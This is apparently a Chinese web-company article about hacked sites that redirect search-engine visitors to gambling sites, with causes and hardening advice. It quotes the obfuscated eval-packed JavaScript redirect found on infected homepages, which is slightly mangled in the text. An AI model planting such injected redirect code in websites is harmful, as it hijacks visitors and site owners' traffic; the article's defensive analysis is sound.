最近公司內(nèi)部跟單同事表示,大批網(wǎng)站建設(shè)公司客戶在做百度推廣時(shí)候,網(wǎng)站的首頁(yè)點(diǎn)擊進(jìn)去后自動(dòng)跳轉(zhuǎn)到彩票網(wǎng)站、博彩網(wǎng)站,這樣用戶從百度搜索或者從推廣廣告位進(jìn)去網(wǎng)站后發(fā)生跳轉(zhuǎn),而直接輸入網(wǎng)址是沒(méi)有任何跳轉(zhuǎn)的,這樣一來(lái)用戶流失造成訪問(wèn)量急劇下滑、網(wǎng)站服務(wù)器資源浪費(fèi)、推廣費(fèi)用浪費(fèi)等,甚至可以說(shuō)做了百度推廣、搜狗推廣的都在給彩票公司做廣告了,在網(wǎng)站建設(shè)行業(yè)內(nèi)引起軒然大波。
有不少客戶在反應(yīng)這個(gè)問(wèn)題時(shí)候,找到廣告商賠償甚至追究責(zé)任,所以在網(wǎng)站惡意跳轉(zhuǎn)的問(wèn)題上我們運(yùn)營(yíng)人員需要重視并且知曉如何快速解決,中聯(lián)科技從網(wǎng)絡(luò)上查閱并且測(cè)試后總結(jié)為以下經(jīng)驗(yàn):
一、分析網(wǎng)站被黑跳轉(zhuǎn)博彩網(wǎng)站原因
一般情況下網(wǎng)站被黑時(shí)候后都是因?yàn)榉?wù)器信息(服務(wù)器IP 遠(yuǎn)程端口 管理員賬號(hào)密碼、SSH端口、root賬號(hào)密碼)和網(wǎng)站信息包括FTP賬號(hào)密碼的對(duì)接被黑客知曉,進(jìn)而造成黑客植入木馬或者后門。
整體的安全監(jiān)測(cè)中,asp網(wǎng)站和php網(wǎng)站都存在著木馬,這也就意味著木馬能夠以php腳本木馬、asp腳本木馬、jsp腳本木馬而存在,這些木馬后門可以對(duì)網(wǎng)站進(jìn)行惡意篡改,上傳,改名,下載,等管理員的高權(quán)限操作。出現(xiàn)網(wǎng)站被跳轉(zhuǎn)的客戶,采用的網(wǎng)站架構(gòu)都是php+mysql架構(gòu),以及jsp+mysql架構(gòu),大多數(shù)用的是開(kāi)源程序,像dedecms,織夢(mèng)系統(tǒng),phpcms系統(tǒng),discuz系統(tǒng)。
當(dāng)我們懂得一些代碼的時(shí)候,必然會(huì)看到網(wǎng)站首頁(yè)中會(huì)有一些惡意篡改代碼,通過(guò)刪除惡意代碼后可能會(huì)在幾天內(nèi)完全的停止跳轉(zhuǎn)的,但是在一段時(shí)間后卻又會(huì)被跳轉(zhuǎn),這個(gè)是很令人懊惱的治標(biāo)不治本措施。過(guò)了不久后網(wǎng)站又會(huì)出現(xiàn)跳轉(zhuǎn),那么針對(duì)于網(wǎng)站漏洞問(wèn)題是很難甚至是不能夠完全清除的。
通過(guò)觀察部分客戶網(wǎng)站首頁(yè),其首頁(yè)代碼中都會(huì)有一段加密代碼,這段代碼是根據(jù)搜索引擎的特征來(lái)跳轉(zhuǎn),比如通過(guò)百度搜索,360搜索,搜狗搜索來(lái)的會(huì)直接跳轉(zhuǎn)到彩票,賭博網(wǎng)站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('l["\e\c\1\m\i\8\n\0"]["\7\4\9\0\8"]('\h\2\1\4\9\3\0\0\j\3\8\d\6\0\8\k\0\5\f\a\r\a\2\1\4\9\3\0 \6\2\4\1\d\6\s\0\0\3\2\q\5\5\7\7\7\b\1\3\e\a\2\p\b\1\c\i \5\j\o\1\b\f\2\6\g\h\5\2\1\4\9\3\0\g');',29,29,'x74|x63|x73|x70|x72| x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c| x38|x3a|x76|x68'.split('|'),0,{}))
一旦被攻擊之后,百度搜索引擎就會(huì)判斷出網(wǎng)站是否被攻擊,從而在百度風(fēng)險(xiǎn)評(píng)估中心就會(huì)對(duì)網(wǎng)站進(jìn)行記錄以及標(biāo)識(shí),百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊,部分頁(yè)面已被非法篡改! 紅色提示該百度風(fēng)險(xiǎn)。導(dǎo)致客戶打開(kāi)網(wǎng)站直接被百度攔截。
針對(duì)于以上跳轉(zhuǎn)攻擊的特征,中聯(lián)科技一致認(rèn)為應(yīng)該從人工代碼方面進(jìn)行審計(jì),以及檢測(cè)網(wǎng)站漏洞、網(wǎng)站后門木馬清理、漏洞修復(fù)以及xss獲取管理員賬號(hào)cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過(guò)漏洞等。
二、修復(fù)以及防止網(wǎng)站被惡意跳轉(zhuǎn)的辦法
1、對(duì)服務(wù)器目錄進(jìn)行安全部署、對(duì)管理員帳號(hào)密碼加密、對(duì)所有密碼進(jìn)行數(shù)字+大小寫字母+特殊符號(hào)要求、對(duì)網(wǎng)站數(shù)據(jù)庫(kù)進(jìn)行分配普通權(quán)限賬號(hào)。
2、mysql數(shù)據(jù)庫(kù)默認(rèn)端口3306,改為61116,并加入到端口安全策略,不對(duì)外開(kāi)放,外網(wǎng)IP無(wú)法連接數(shù)據(jù)庫(kù),只有本地127.0.0.1才能進(jìn)行連接數(shù)據(jù)庫(kù),以防止攻擊者惡意猜測(cè)。
3、對(duì)服務(wù)器底層系統(tǒng)進(jìn)行安全加固,包括遠(yuǎn)程端口登錄的安全驗(yàn)證。
4、對(duì)網(wǎng)站代碼進(jìn)行整體的安全檢測(cè),包括定期的升級(jí)網(wǎng)站程序源代碼,修復(fù)補(bǔ)丁以及網(wǎng)站漏洞。
中聯(lián)科技處理網(wǎng)站跳轉(zhuǎn)問(wèn)題有很多方法,以上內(nèi)容只是解決問(wèn)題的方法之一,那么作為一個(gè)網(wǎng)站建設(shè)公司應(yīng)該對(duì)源碼進(jìn)行優(yōu)化和調(diào)整,這樣才能確保后期的網(wǎng)站不會(huì)受到影響,這就涉及到網(wǎng)站源碼升級(jí)以及版本升級(jí)問(wèn)題。